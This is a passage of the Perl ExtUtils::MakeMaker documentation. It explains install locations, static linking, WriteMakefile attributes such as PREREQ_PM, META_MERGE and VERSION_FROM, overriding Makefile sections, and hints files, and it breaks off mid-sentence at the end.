INSTALL_BASE in MakeMaker and --install_base in Module::Build (as of 0.28) install to the same location. If you want MakeMaker and Module::Build to install to the same location simply set INSTALL_BASE and --install_base to the same location.
INSTALL_BASE was added in 6.31.
PREFIX and LIB can be used to set several INSTALL* attributes in one go. Here's an example for installing into your home directory.
# Unix users, PREFIX=~ works fine
perl Makefile.PL PREFIX=/path/to/your/home/dir
This will install all files in the module under your home directory, with man pages and libraries going into an appropriate place (usually ~/man and ~/lib). How the exact location is determined is complicated and depends on how your Perl was configured. INSTALL_BASE works more like what other build systems call "prefix" than PREFIX and we recommend you use that instead.
Another way to specify many INSTALL directories with a single parameter is LIB.
perl Makefile.PL LIB=~/lib
This will install the module's architecture-independent files into ~/lib, the architecture-dependent files into ~/lib/$archname.
Note, that in both cases the tilde expansion is done by MakeMaker, not by perl by default, nor by make.
Conflicts between parameters LIB, PREFIX and the various INSTALL* arguments are resolved so that:
setting LIB overrides any setting of INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSITELIB, INSTALLSITEARCH (and they are not affected by PREFIX);
without LIB, setting PREFIX replaces the initial $Config{prefix} part of those INSTALL* arguments, even if the latter are explicitly set (but are set to still start with $Config{prefix}).
If the user has superuser privileges, and is not working on AFS or relatives, then the defaults for INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSCRIPT, etc. will be appropriate, and this incantation will be the best:
perl Makefile.PL;
make;
make test
make install
make install by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This feature can be bypassed by calling make pure_install.
AFS users will have to specify the installation directories as these most probably have changed since perl itself has been installed. They will have to do this by calling
perl Makefile.PL INSTALLSITELIB=/afs/here/today \
INSTALLSCRIPT=/afs/there/now INSTALLMAN3DIR=/afs/for/manpages
make
Be careful to repeat this procedure every time you recompile an extension, unless you are sure the AFS installation directories are still valid.
An extension that is built with the above steps is ready to use on systems supporting dynamic loading. On systems that do not support dynamic loading, any newly created extension has to be linked together with the available resources. MakeMaker supports the linking process by creating appropriate targets in the Makefile whenever an extension is built. You can invoke the corresponding section of the makefile with
make perl
That produces a new perl binary in the current directory with all extensions linked in that can be found in INST_ARCHLIB, SITELIBEXP, and PERL_ARCHLIB. To do that, MakeMaker writes a new Makefile, on UNIX, this is called Makefile.aperl (may be system dependent). If you want to force the creation of a new perl, it is recommended that you delete this Makefile.aperl, so the directories are searched through for linkable libraries again.
The binary can be installed into the directory where perl normally resides on your machine with
make inst_perl
To produce a perl binary with a different name than perl, either say
perl Makefile.PL MAP_TARGET=myperl
make myperl
make inst_perl
or say
perl Makefile.PL
make myperl MAP_TARGET=myperl
make inst_perl MAP_TARGET=myperl
In any case you will be prompted with the correct invocation of the inst_perl target that installs the new binary into INSTALLBIN.
make inst_perl by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This can be bypassed by calling make pure_inst_perl.
Warning: the inst_perl: target will most probably overwrite your existing perl binary. Use with care!
Sometimes you might want to build a statically linked perl although your system supports dynamic loading. In this case you may explicitly set the linktype with the invocation of the Makefile.PL or make:
perl Makefile.PL LINKTYPE=static # recommended
or
make LINKTYPE=static # works on most systems
MakeMaker needs to know, or to guess, where certain things are located. Especially INST_LIB and INST_ARCHLIB (where to put the files during the make(1) run), PERL_LIB and PERL_ARCHLIB (where to read existing modules from), and PERL_INC (header files and libperl*.*).
Extensions may be built either using the contents of the perl source directory tree or from the installed perl library. The recommended way is to build extensions after you have run 'make install' on perl itself. You can do that in any directory on your hard disk that is not below the perl source tree. The support for extensions below the ext directory of the perl distribution is only good for the standard extensions that come with perl.
If an extension is being built below the ext/ directory of the perl source then MakeMaker will set PERL_SRC automatically (e.g., ../..). If PERL_SRC is defined and the extension is recognized as a standard extension, then other variables default to the following:
PERL_INC = PERL_SRC
PERL_LIB = PERL_SRC/lib
PERL_ARCHLIB = PERL_SRC/lib
INST_LIB = PERL_LIB
INST_ARCHLIB = PERL_ARCHLIB
If an extension is being built away from the perl source then MakeMaker will leave PERL_SRC undefined and default to using the installed copy of the perl library. The other variables default to the following:
PERL_INC = $archlibexp/CORE
PERL_LIB = $privlibexp
PERL_ARCHLIB = $archlibexp
INST_LIB = ./blib/lib
INST_ARCHLIB = ./blib/arch
If perl has not yet been installed then PERL_SRC can be defined on the command line as shown in the previous section.
If you don't want to keep the defaults for the INSTALL* macros, MakeMaker helps you to minimize the typing needed: the usual relationship between INSTALLPRIVLIB and INSTALLARCHLIB is determined by Configure at perl compilation time. MakeMaker supports the user who sets INSTALLPRIVLIB. If INSTALLPRIVLIB is set, but INSTALLARCHLIB not, then MakeMaker defaults the latter to be the same subdirectory of INSTALLPRIVLIB as Configure decided for the counterparts in %Config, otherwise it defaults to INSTALLPRIVLIB. The same relationship holds for INSTALLSITELIB and INSTALLSITEARCH.
MakeMaker gives you much more freedom than needed to configure internal variables and get different results. It is worth mentioning that make(1) also lets you configure most of the variables that are used in the Makefile. But in the majority of situations this will not be necessary, and should only be done if the author of a package recommends it (or you know what you're doing).
The following attributes may be specified as arguments to WriteMakefile() or as NAME=VALUE pairs on the command line. Attributes that became available with later versions of MakeMaker are indicated.
In order to maintain portability of attributes with older versions of MakeMaker you may want to use App::EUMM::Upgrade with your Makefile.PL.
One line description of the module. Will be included in PPD file.
Name of the file that contains the package description. MakeMaker looks for a line in the POD matching /^($package\s-\s)(.*)/. This is typically the first line in the "=head1 NAME" section. $2 becomes the abstract.
Array of strings containing name (and email address) of package author(s). Is used in CPAN Meta files (META.yml or META.json) and PPD (Perl Package Description) files for PPM (Perl Package Manager).
Used when creating PPD files for binary packages. It can be set to a full or relative path or URL to the binary archive for a particular architecture. For example:
perl Makefile.PL BINARY_LOCATION=x86/Agent.tar.gz
builds a PPD package that references a binary of the Agent package, located in the x86 directory relative to the PPD itself.
Available in version 6.5503 and above.
A hash of modules that are needed to build your module but not run it.
This will go into the build_requires field of your META.yml and the build of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Ref to array of *.c file names. Initialised from a directory scan and the values portion of the XS attribute hash. This is not currently used by MakeMaker but may be handy in Makefile.PLs.
String that will be included in the compiler call command line between the arguments INC and OPTIMIZE.
Arrayref. E.g. [qw(archname manext)] defines ARCHNAME & MANEXT from config.sh. MakeMaker will add to CONFIG the following values anyway: ar cc cccdlflags ccdlflags dlext dlsrc ld lddlflags ldflags libc lib_ext obj_ext ranlib sitelibexp sitearchexp so
CODE reference. The subroutine should return a hash reference. The hash may contain further attributes, e.g. {LIBS => ...}, that have to be determined by some evaluation method.
Available in version 6.52 and above.
A hash of modules that are required to run Makefile.PL itself, but not to run your distribution.
This will go into the configure_requires field of your META.yml and the configure of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Something like "-DHAVE_UNISTD_H"
This is the root directory into which the code will be installed. It prepends itself to the normal prefix. For example, if your code would normally go into /usr/local/lib/perl you could set DESTDIR=~/tmp/ and installation would go into ~/tmp/usr/local/lib/perl.
This is primarily of use for people who repackage Perl modules.
NOTE: Due to the nature of make, it is important that you put the trailing slash on your DESTDIR. ~/tmp/ not ~/tmp.
Ref to array of subdirectories containing Makefile.PLs e.g. ['sdbm'] in ext/SDBM_File
A safe filename for the package.
Defaults to NAME below but with :: replaced with -.
For example, Foo::Bar becomes Foo-Bar.
Your name for distributing the package with the version number included. This is used by 'make dist' to name the resulting archive file.
Defaults to DISTNAME-VERSION.
For example, version 1.04 of Foo::Bar becomes Foo-Bar-1.04.
On some OS's where . has special meaning VERSION_SYM may be used in place of VERSION.
Specifies the extension of the module's loadable object. For example:
DLEXT => 'unusual_ext', # Default value is $Config{so}
NOTE: When using this option to alter the extension of a module's loadable object, it is also necessary that the module's pm file specifies the same change:
local $DynaLoader::dl_dlext = 'unusual_ext';
Hashref of symbol names for routines to be made available as universal symbols. Each key/value pair consists of the package name and an array of routine names in that package. Used only under AIX, OS/2, VMS and Win32 at present. The routine names supplied will be expanded in the same way as XSUB names are expanded by the XS() macro. Defaults to
{"$(NAME)" => ["boot_$(NAME)" ] }
e.g.
{"RPC" => [qw( boot_rpcb rpcb_gettime getnetconfigent )],
"NetconfigPtr" => [ 'DESTROY'] }
Please see the ExtUtils::Mksymlists documentation for more information about the DL_FUNCS, DL_VARS and FUNCLIST attributes.
Array of symbol names for variables to be made available as universal symbols. Used only under AIX, OS/2, VMS and Win32 at present. Defaults to []. (e.g. [ qw(Foo_version Foo_numstreams Foo_tree ) ])
Array of extension names to exclude when doing a static build. This is ignored if INCLUDE_EXT is present. Consult INCLUDE_EXT for more details. (e.g. [ qw( Socket POSIX ) ] )
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL EXCLUDE_EXT='Socket Safe'
Ref to array of executable files. The files will be copied to the INST_SCRIPT directory. Make realclean will delete them from there again.
If your executables start with something like #!perl or #!/usr/bin/perl MakeMaker will change this to the path of the perl 'Makefile.PL' was invoked with so the programs will be sure to run properly even if perl is not in /usr/bin/perl.
The name of the Makefile to be produced. This is used for the second Makefile that will be produced for the MAP_TARGET.
Defaults to 'Makefile' or 'Descrip.MMS' on VMS.
(Note: we couldn't use MAKEFILE because dmake uses this for something else).
Perl binary able to run this extension, load XS modules, etc...
Like PERLRUN, except it uses FULLPERL.
Like PERLRUNINST, except it uses FULLPERL.
This provides an alternate means to specify function names to be exported from the extension. Its value is a reference to an array of function names to be exported by the extension. These names are passed through unaltered to the linker options file.
Ref to array of *.h file names. Similar to C.
This attribute is used to specify names to be imported into the extension. Takes a hash ref.
It is only used on OS/2 and Win32.
Include file dirs eg: "-I/usr/5include -I/path/to/inc"
Array of extension names to be included when doing a static build. MakeMaker will normally build with all of the installed extensions when doing a static build, and that is usually the desired behavior. If INCLUDE_EXT is present then MakeMaker will build only with those extensions which are explicitly mentioned. (e.g. [ qw( Socket POSIX ) ])
It is not necessary to mention DynaLoader or the current extension when filling in INCLUDE_EXT. If the INCLUDE_EXT is mentioned but is empty then only DynaLoader and the current extension will be included in the build.
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL INCLUDE_EXT='POSIX Socket Devel::Peek'
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to perl.
Directory to install binary files (e.g. tkperl) into if INSTALLDIRS=perl.
Determines which of the sets of installation directories to choose: perl, site or vendor. Defaults to site.
These directories get the man pages at 'make install' time if INSTALLDIRS=perl. Defaults to $Config{installman*dir}.
If set to 'none', no man pages will be installed.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to perl.
Defaults to $Config{installprivlib}.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS=perl.
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to site (default).
These directories get the man pages at 'make install' time if INSTALLDIRS=site (default). Defaults to $(SITEPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to vendor.
These directories get the man pages at 'make install' time if INSTALLDIRS=vendor. Defaults to $(VENDORPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to vendor.
Same as INST_LIB for architecture dependent files.
Directory to put real binary files during 'make'. These will be copied to INSTALLBIN during 'make install'
Directory where we put library files of this extension while building it.
Directory to hold the man pages at 'make' time
Directory to hold the man pages at 'make' time
Directory where executable files should be installed during 'make'. Defaults to "./blib/script", just to have a dummy location during testing. make install will copy the files in INST_SCRIPT to INSTALLSCRIPT.
Program to be used to link libraries for dynamic loading.
Defaults to $Config{ld}.
Any special flags that might need to be passed to ld to create a shared library suitable for dynamic loading. It is up to the makefile to use it. (See "lddlflags" in Config)
Defaults to $Config{lddlflags}.
Defaults to "$(OBJECT)" and is used in the ld command to specify what files to link/load from (also see dynamic_lib below for how to specify ld flags)
LIB should only be set at perl Makefile.PL time but is allowed as a MakeMaker argument. It has the effect of setting both INSTALLPRIVLIB and INSTALLSITELIB to that value regardless any explicit setting of those arguments (or of PREFIX). INSTALLARCHLIB and INSTALLSITEARCH are set to the corresponding architecture subdirectory.
The filename of the perllibrary that will be used together with this extension. Defaults to libperl.a.
An anonymous array of alternative library specifications to be searched for (in order) until at least one library is found. E.g.
'LIBS' => ["-lgdbm", "-ldbm -lfoo", "-L/path -ldbm.nfs"]
Mind, that any element of the array contains a complete set of arguments for the ld command. So do not specify
'LIBS' => ["-ltcl", "-ltk", "-lX11"]
See ODBM_File/Makefile.PL for an example, where an array is needed. If you specify a scalar as in
'LIBS' => "-ltcl -ltk -lX11"
MakeMaker will turn it into an array with one element.
Available in version 6.31 and above.
The licensing terms of your distribution. Generally it's "perl_5" for the same license as Perl itself.
See CPAN::Meta::Spec for the list of options.
Defaults to "unknown".
'static' or 'dynamic' (default unless usedl=undef in config.sh). Should only be used to force static linking (also see linkext below).
When this is set to 1, OBJECT will be automagically derived from O_FILES.
Variant of make you intend to run the generated Makefile with. This parameter lets Makefile.PL know what make quirks to account for when generating the Makefile.
MakeMaker also honors the MAKE environment variable. This parameter takes precedence.
Currently the only significant values are 'dmake' and 'nmake' for Windows users, instructing MakeMaker to generate a Makefile in the flavour of DMake ("Dennis Vadura's Make") or Microsoft NMake respectively.
Defaults to $Config{make}, which may go looking for a Make program in your environment.
How are you supposed to know what flavour of Make a Makefile has been generated for if you didn't specify a value explicitly? Search the generated Makefile for the definition of the MAKE variable, which is used to recursively invoke the Make utility. That will tell you what Make you're supposed to invoke the Makefile with.
Boolean which tells MakeMaker that it should include the rules to make a perl. This is handled automatically as a switch by MakeMaker. The user normally does not need it.
When 'make clean' or similar is run, the $(FIRST_MAKEFILE) will be backed up at this location.
Defaults to $(FIRST_MAKEFILE).old or $(FIRST_MAKEFILE)_old on VMS.
Hashref of pod-containing files. MakeMaker will default this to all EXE_FILES files that include POD directives. The files listed here will be converted to man pages and installed as was requested at Configure time.
This hash should map POD files (or scripts containing POD) to the man file names under the blib/man1/ directory, as in the following example:
MAN1PODS => {
'doc/command.pod' => 'blib/man1/command.1',
'scripts/script.pl' => 'blib/man1/script.1',
}
Hashref that assigns to *.pm and *.pod files the files into which the manpages are to be written. MakeMaker parses all *.pod and *.pm files for POD directives. Files that contain POD will be the default keys of the MAN3PODS hashref. These will then be converted to man pages during make and will be installed during make install.
Example similar to MAN1PODS.
If it is intended that a new perl binary be produced, this variable may hold a name for that binary. Defaults to perl
Available in version 6.46 and above.
A hashref of items to add to the CPAN Meta file (META.yml or META.json).
They differ in how they behave if they have the same key as the default metadata. META_ADD will override the default value with its own. META_MERGE will merge its value with the default.
Unless you want to override the defaults, prefer META_MERGE so as to get the advantage of any future defaults.
Where prereqs are concerned, if META_MERGE is used, prerequisites are merged with their counterpart WriteMakefile() argument (PREREQ_PM is merged into {prereqs}{runtime}{requires}, BUILD_REQUIRES into {prereqs}{build}{requires}, CONFIGURE_REQUIRES into {prereqs}{configure}{requires}, and TEST_REQUIRES into {prereqs}{test}{requires}). When prereqs are specified with META_ADD, the only prerequisites added to the file come from the metadata, not WriteMakefile() arguments.
Note that these configuration options are only used for generating META.yml and META.json -- they are NOT used for MYMETA.yml and MYMETA.json. Therefore data in these fields should NOT be used for dynamic (user-side) configuration.
By default CPAN Meta specification 1.4 is used. In order to use CPAN Meta specification 2.0, indicate with meta-spec the version you want to use.
META_MERGE => {
"meta-spec" => { version => 2 },
resources => {
repository => {
type => 'git',
url => 'git://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.git',
web => 'https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker',
},
},
},
Available in version 6.48 and above.
The minimum required version of Perl for this distribution.
Either the 5.006001 or the 5.6.1 format is acceptable.
If the extension links to a library that it builds, set this to the name of the library (see SDBM_File)
The package representing the distribution. For example, Test::More or ExtUtils::MakeMaker. It will be used to derive information about the distribution such as the "DISTNAME", installation locations within the Perl library and where XS files will be looked for by default (see "XS").
NAME must be a valid Perl package name and it must have an associated .pm file. For example, Foo::Bar is a valid NAME and there must exist Foo/Bar.pm. Any XS code should be in Bar.xs unless stated otherwise.
Your distribution must have a NAME.
MakeMaker will figure out if an extension contains linkable code anywhere down the directory tree, and will set this variable accordingly, but you can speed it up a very little bit if you define this boolean variable yourself.
Command so make does not print the literal commands it's running.
By setting it to an empty string you can generate a Makefile that prints all commands. Mainly used in debugging MakeMaker itself.
Defaults to @.
Boolean. Attribute to inhibit descending into subdirectories.
When true, suppresses the generation and addition to the MANIFEST of the META.yml and META.json module meta-data files during 'make distdir'.
Defaults to false.
When true, suppresses the generation of MYMETA.yml and MYMETA.json module meta-data files during 'perl Makefile.PL'.
Defaults to false.
When true, suppresses the writing of packlist files for installs.
Defaults to false.
When true, suppresses the appending of installations to perllocal.
Defaults to false.
In general, any generated Makefile checks for the current version of MakeMaker and the version the Makefile was built under. If NO_VC is set, the version check is neglected. Do not write this into your Makefile.PL, use it interactively instead.
List of object files, defaults to '$(BASEEXT)$(OBJ_EXT)', but can be a long string or an array containing all object files, e.g. "tkpBind.o tkpButton.o tkpCanvas.o" or ["tkpBind.o", "tkpButton.o", "tkpCanvas.o"]
(Where BASEEXT is the last component of NAME, and OBJ_EXT is $Config{obj_ext}.)
Defaults to -O. Set it to -g to turn debugging on. The flag is passed to subdirectory makes.
Perl binary for tasks that can be done by miniperl.
Set only when MakeMaker is building the extensions of the Perl core distribution.
The call to the program that is able to compile perlmain.c. Defaults to $(CC).
Same as for PERL_LIB, but for architecture dependent files.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_ARCHLIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
Directory containing the Perl library to use.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_LIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
defaults to 0. Should be set to TRUE if the extension can work with the memory allocation routines substituted by the Perl malloc() subsystem. This should be applicable to most extensions with exceptions of those
with bugs in memory allocations which are caught by Perl's malloc();
which interact with the memory allocator in other ways than via malloc(), realloc(), free(), calloc(), sbrk() and brk();
which rely on special alignment which is not provided by Perl's malloc().
NOTE. Neglecting to set this flag in any one of the loaded extension nullifies many advantages of Perl's malloc(), such as better usage of system resources, error detection, memory usage reporting, catchable failure of memory allocations, etc.
Directory under which core modules are to be installed.
Defaults to $Config{installprefixexp}, falling back to $Config{installprefix}, $Config{prefixexp} or $Config{prefix} should $Config{installprefixexp} not exist.
Overridden by PREFIX.
Use this instead of $(PERL) when you wish to run perl. It will set up extra necessary flags for you.
Use this instead of $(PERL) when you wish to run perl to work with modules. It will add things like -I$(INST_ARCH) and other necessary flags so perl can see the modules you're about to install.
Directory containing the Perl source code (use of this should be avoided, it may be undefined)
Desired permission for directories. Defaults to 755.
Desired permission for read/writable files. Defaults to 644.
Desired permission for executable files. Defaults to 755.
MakeMaker can run programs to generate files for you at build time. By default any file named *.PL (except Makefile.PL and Build.PL) in the top level directory will be assumed to be a Perl program and run passing its own basename in as an argument. For example...
perl foo.PL foo
This behavior can be overridden by supplying your own set of files to search. PL_FILES accepts a hash ref, the key being the file to run and the value is passed in as the first argument when the PL file is run.
PL_FILES => {'bin/foobar.PL' => 'bin/foobar'}
Would run bin/foobar.PL like this:
perl bin/foobar.PL bin/foobar
If multiple files from one program are desired an array ref can be used.
PL_FILES => {'bin/foobar.PL' => [qw(bin/foobar1 bin/foobar2)]}
In this case the program will be run multiple times using each target file.
perl bin/foobar.PL bin/foobar1
perl bin/foobar.PL bin/foobar2
PL files are normally run after pm_to_blib and include INST_LIB and INST_ARCH in their @INC, so the just built modules can be accessed... unless the PL file is making a module (or anything else in PM) in which case it is run before pm_to_blib and does not include INST_LIB and INST_ARCH in its @INC. This apparently odd behavior is there for backwards compatibility (and it's somewhat DWIM).
Hashref of .pm files and *.pl files to be installed. e.g.
{'name_of_file.pm' => '$(INST_LIB)/install_as.pm'}
By default this will include *.pm and *.pl and the files found in the PMLIBDIRS directories. Defining PM in the Makefile.PL will override PMLIBDIRS.
Ref to array of subdirectories containing library files. Defaults to [ 'lib', $(BASEEXT) ]. The directories will be scanned and any files they contain will be installed in the corresponding location in the library. A libscan() method can be used to alter the behaviour. Defining PM in the Makefile.PL will override PMLIBDIRS.
(Where BASEEXT is the last component of NAME.)
A filter program, in the traditional Unix sense (input from stdin, output to stdout) that is passed on each .pm file during the build (in the pm_to_blib() phase). It is empty by default, meaning no filtering is done.
Great care is necessary when defining the command if quoting needs to be done. For instance, you would need to say:
{'PM_FILTER' => 'grep -v \\"^\\#\\"'}
to remove all the leading comments on the fly during the build. The extra \\ are necessary, unfortunately, because this variable is interpolated within the context of a Perl program built on the command line, and double quotes are what is used with the -e switch to build that command line. The # is escaped for the Makefile, since what is going to be generated will then be:
PM_FILTER = grep -v \"^\#\"
Without the \\ before the #, we'd have the start of a Makefile comment, and the macro would be incorrectly defined.
Release 5.005 grandfathered old global symbol names by providing preprocessor macros for extension source compatibility. As of release 5.6, these preprocessor definitions are not available by default. The POLLUTE flag specifies that the old names should still be defined:
perl Makefile.PL POLLUTE=1
Please inform the module author if this is necessary to successfully install a module under 5.6 or later.
Name of the executable used to run PPM_INSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager after the installation of a package.
Name of the executable used to run PPM_UNINSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager before the removal of a package.
This overrides all the default install locations. Man pages, libraries, scripts, etc... MakeMaker will try to make an educated guess about where to place things under the new PREFIX based on your Config defaults. Failing that, it will fall back to a structure which should be sensible for your platform.
If you specify LIB or any INSTALL* variables they will not be affected by the PREFIX.
Bool. If this parameter is true, failing to have the required modules (or the right versions thereof) will be fatal. perl Makefile.PL will die instead of simply informing the user of the missing dependencies.
It is extremely rare to have to use PREREQ_FATAL. Its use by module authors is strongly discouraged and should never be used lightly.
For dependencies that are required in order to run Makefile.PL, see CONFIGURE_REQUIRES.
Module installation tools have ways of resolving unmet dependencies but to do that they need a Makefile. Using PREREQ_FATAL breaks this. That's bad.
Assuming you have good test coverage, your tests should fail with missing dependencies informing the user more strongly that something is wrong. You can write a t/00compile.t test which will simply check that your code compiles and stop "make test" prematurely if it doesn't. See "BAIL_OUT" in Test::More for more details.
A hash of modules that are needed to run your module. The keys are the module names ie. Test::More, and the minimum version is the value. If the required version number is 0 any version will do.
This will go into the requires field of your META.yml and the runtime of the prereqs field of your META.json.
PREREQ_PM => {
# Require Test::More at least 0.47
"Test::More" => "0.47",
# Require any version of Acme::Buffy
"Acme::Buffy" => 0,
}
Bool. If this parameter is true, the prerequisites will be printed to stdout and MakeMaker will exit. The output format is an evalable hash ref.
$PREREQ_PM = {
'A::B' => Vers1,
'C::D' => Vers2,
...
};
If a distribution defines a minimal required perl version, this is added to the output as an additional line of the form:
$MIN_PERL_VERSION = '5.008001';
If BUILD_REQUIRES is not empty, it will be dumped as $BUILD_REQUIRES hashref.
RedHatism for PREREQ_PRINT. The output format is different, though:
perl(A::B)>=Vers1 perl(C::D)>=Vers2 ...
A minimal required perl version, if present, will look like this:
perl(perl)>=5.008001
Like PERLPREFIX, but only for the site install locations.
Defaults to $Config{siteprefixexp}. Perls prior to 5.6.0 didn't have an explicit siteprefix in the Config. In those cases $Config{installprefix} will be used.
Overridable by PREFIX
When true, perform the generation and addition to the MANIFEST of the SIGNATURE file in the distdir during 'make distdir', via 'cpansign -s'.
Note that you need to install the Module::Signature module to perform this operation.
Defaults to false.
Arrayref. E.g. [qw(name1 name2)] skip (do not write) sections of the Makefile. Caution! Do not use the SKIP attribute for the negligible speedup. It may seriously damage the resulting Makefile. Only use it if you really need it.
Available in version 6.64 and above.
A hash of modules that are needed to test your module but not run or build it.
This will go into the build_requires field of your META.yml and the test of the prereqs field of your META.json.
The format is the same as PREREQ_PM.
Ref to array of typemap file names. Use this when the typemaps are in some directory other than the current directory or when they are not named typemap. The last typemap in the list takes precedence. A typemap in the current directory has highest precedence, even if it isn't listed in TYPEMAPS. The default system typemap has lowest precedence.
Like PERLPREFIX, but only for the vendor install locations.
Defaults to $Config{vendorprefixexp}.
Overridable by PREFIX
If true, make install will be verbose
Your version number for distributing the package. This defaults to 0.1.
Instead of specifying the VERSION in the Makefile.PL you can let MakeMaker parse a file to determine the version number. The parsing routine requires that the file named by VERSION_FROM contains one single line to compute the version number. The first line in the file that contains something like a $VERSION assignment or package Name VERSION will be used. The following lines will be parsed o.k.:
# Good
package Foo::Bar 1.23; # 1.23
$VERSION = '1.00'; # 1.00
*VERSION = \'1.01'; # 1.01
($VERSION) = q$Revision$ =~ /(\d+)/g; # The digits in $Revision$
$FOO::VERSION = '1.10'; # 1.10
*FOO::VERSION = \'1.11'; # 1.11
but these will fail:
# Bad
my $VERSION = '1.01';
local $VERSION = '1.02';
local $FOO::VERSION = '1.30';
(Putting my or local on the preceding line will work o.k.)
"Version strings" are incompatible and should not be used.
# Bad
$VERSION = 1.2.3;
$VERSION = v1.2.3;
version objects are fine. As of MakeMaker 6.35 version.pm will be automatically loaded, but you must declare the dependency on version.pm. For compatibility with older MakeMaker you should load version.pm on the same line as $VERSION is declared.
# All on one line
use version; our $VERSION = qv(1.2.3);
The file named in VERSION_FROM is not added as a dependency to Makefile. This is not really correct, but it would be a major pain during development to have to rewrite the Makefile for any smallish change in that file. If you want to make sure that the Makefile contains the correct VERSION macro after any change of the file, you would have to do something like
depend => { Makefile => '$(VERSION_FROM)' }
See attribute depend below.
A sanitized VERSION with . replaced by _. For places where . has special meaning (some filesystems, RCS labels, etc...)
Hashref of .xs files. MakeMaker will default this. e.g.
{'name_of_file.xs' => 'name_of_file.c'}
The .c files will automatically be included in the list of files deleted by a make clean.
String of options to pass to xsubpp. This might include -C++ or -extern. Do not include typemaps here; the TYPEMAP parameter exists for that purpose.
May be set to -prototypes, -noprototypes or the empty string. The empty string is equivalent to the xsubpp default, or -noprototypes. See the xsubpp documentation for details. MakeMaker defaults to the empty string.
Your version number for the .xs file of this package. This defaults to the value of the VERSION attribute.
Additional lowercase attributes can be used to pass parameters to the methods which implement that part of the Makefile. Parameters are specified as a hash ref but are passed to the method as a hash.
{FILES => "*.xyz foo"}
{ANY_TARGET => ANY_DEPENDENCY, ...}
(ANY_TARGET must not be given a double-colon rule by MakeMaker.)
{TARFLAGS => 'cvfF', COMPRESS => 'gzip', SUFFIX => '.gz',
SHAR => 'shar -m', DIST_CP => 'ln', ZIP => '/bin/zip',
ZIPFLAGS => '-rl', DIST_DEFAULT => 'private tardist' }
If you specify COMPRESS, then SUFFIX should also be altered, as it is needed to tell make the target file of the compression. Setting DIST_CP to ln can be useful, if you need to preserve the timestamps on your files. DIST_CP can take the values 'cp', which copies the file, 'ln', which links the file, and 'best' which copies symbolic links and links the rest. Default is 'best'.
{ARMAYBE => 'ar', OTHERLDFLAGS => '...', INST_DYNAMIC_DEP => '...'}
{LINKTYPE => 'static', 'dynamic' or ''}
NB: Extensions that have nothing but *.pm files had to say
{LINKTYPE => ''}
with Pre-5.0 MakeMakers. Since version 5.00 of MakeMaker such a line can be deleted safely. MakeMaker recognizes when there's nothing to be linked.
{ANY_MACRO => ANY_VALUE, ...}
Anything put here will be passed to MY::postamble() if you have one.
{FILES => '$(INST_ARCHAUTODIR)/*.xyz'}
Specify the targets for testing.
{TESTS => 't/*.t'}
RECURSIVE_TEST_FILES can be used to include all directories recursively under t that contain .t files. It will be ignored if you provide your own TESTS attribute, defaults to false.
{RECURSIVE_TEST_FILES=>1}
{MAXLEN => 8}
If you cannot achieve the desired Makefile behaviour by specifying attributes you may define private subroutines in the Makefile.PL. Each subroutine returns the text it wishes to have written to the Makefile. To override a section of the Makefile you can either say:
sub MY::c_o { "new literal text" }
or you can edit the default by saying something like:
package MY; # so that "SUPER" works right
sub c_o {
my $inherited = shift->SUPER::c_o(@_);
$inherited =~ s/old text/new text/;
$inherited;
}
If you are running experiments with embedding perl as a library into other applications, you might find MakeMaker is not sufficient. You'd better have a look at ExtUtils::Embed which is a collection of utilities for embedding.
If you still need a different solution, try to develop another subroutine that fits your needs and submit the diffs to makemaker@perl.org
For a complete description of all MakeMaker methods see ExtUtils::MM_Unix.
Here is a simple example of how to add a new target to the generated Makefile:
sub MY::postamble {
return <<'MAKE_FRAG';
$(MYEXTLIB): sdbm/Makefile
cd sdbm && $(MAKE) all
MAKE_FRAG
}
WriteMakefile() now does some basic sanity checks on its parameters to protect against typos and malformatted values. This means some things which happened to work in the past will now throw warnings and possibly produce internal errors.
Some of the most common mistakes:
MAN3PODS => ' '
This is commonly used to suppress the creation of man pages. MAN3PODS takes a hash ref not a string, but the above worked by accident in old versions of MakeMaker.
The correct code is MAN3PODS => { }.
MakeMaker.pm uses the architecture-specific information from Config.pm. In addition it evaluates architecture-specific hints files in a hints/ directory. The hints files are expected to be named like their counterparts in PERL_SRC/hints, but with a .pl file name extension (e.g. next_3_2.pl). They are simply evaled by MakeMaker within the WriteMakefile() subroutine, and can be used to execute commands as well as to include special variables. The rules by which the hintsfile is chosen are the same as in Configure.
The hintsfile is eval()ed immediately after the arguments given to WriteMakefile are stuffed into a hash reference $self but before this reference becomes blessed. So if you want to do the equivalent to override or create an attribute you would say something like
